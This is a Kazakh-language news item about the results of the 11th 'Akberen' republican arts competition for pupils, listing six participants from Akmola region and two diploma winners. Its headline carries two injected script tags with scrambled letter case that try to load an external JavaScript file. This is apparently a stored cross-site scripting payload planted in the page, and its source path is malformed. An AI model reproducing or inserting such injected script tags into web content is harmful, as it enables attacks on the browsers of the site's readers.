Шығармашыл оқушылар арасындағы XІ «Ақберен» республикалық өнер байкауының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
18.11.2024
2024 жылғы 13-15 қараша аралығында Астана қаласындағы № 9 «Зерде» мамандандырылған мектеп базасында 8-11 сынып оқушылары арасында шығармашыл оқушыларға арналған XІ республикалық «Ақберен» өнер байқауының қорытынды кезеңі өтті. Байқауға еліміздің әр өңірінен 120-дан астам өнерпаз оқушы қатысты.
Байқаудың мақсаты: шығармашыл оқушылардың гуманитарлық-эстетикалық ғылымдар саласында кәсіптік қызметін таңдауға шығармашылық қабілетті, өлең жазу, тапқырлық қырын, дарындылығын таныту, олардың шығармашылық қабілеттеріне қолдау көрсетіп, ары қарай дамытуына жол ашу.
Қорытынды кезеңге Ақмола облысынан 6 оқушысы қатысты:
- «Ұлттық аспапта өнер көрсету» номинациясы бойынша - Изатулла Қорғасбек – Целиноград ауданы, Талапкер ауылы жалпы орта білім беретін мектебінің 9-сынып оқушысы;
- «Ақындар мүшәйрасы» номинациясы бойынша Сэрэкболатұлы Сәттібек – Ерейментау ауданы, Еркіншілік ауылы жалпы орта білім беретін мектебінің 10-сынып оқушысы;
- «Ақындар айтысы» номинациясы бойынша Елешұлы Нұрғиса - Бұланды ауданы, Қараөзек ауылының жалпы орта білім беретін мектебінің 9-сынып оқушысы;
- «Эссе жазу» номинациясы бойынша Елай Унай - Ерейментау ауданы, Өлеңті ауылының жалпы орта білім беретін мектебінің 9-сынып оқушысы;
- «Көркемсөз оқу» номинациясы бойынша Орынбасар Әжігүл - Қосшы қаласының №2 жалпы орта білім беретін мектебінің 8-сынып оқушысы;
- «Шешендік, білгірлік сайысы» номинациясы бойынша Еркенова Бақытгүл - Бурабай ауданы, Зелёный бор ауылының мектеп-гимназиясының 9-сынып оқушысы.
Байқау қорытындысы бойынша І-дәрежелі дипломмен «Ұлттық аспапта өнер көрсету» номинациясы бойынша Целиноград ауданы, Талапкер ауылы жалпы орта білім беретін мектебінің 9-сынып оқушысы Изатулла Қорғасбек марапатталды.
ІІ-дәрежелі дипломмен «Ақындар мүшәйрасы» номинациясы бойынша Ерейментау ауданы, Еркіншілік ауылы жалпы орта білім беретін мектебінің 10-сынып оқушысы Сэрэкболатұлы Сәттібек марапатталды.
Шын жүректен құттықтаймыз және одан әрі шығармашылық табыс тілейміз!!!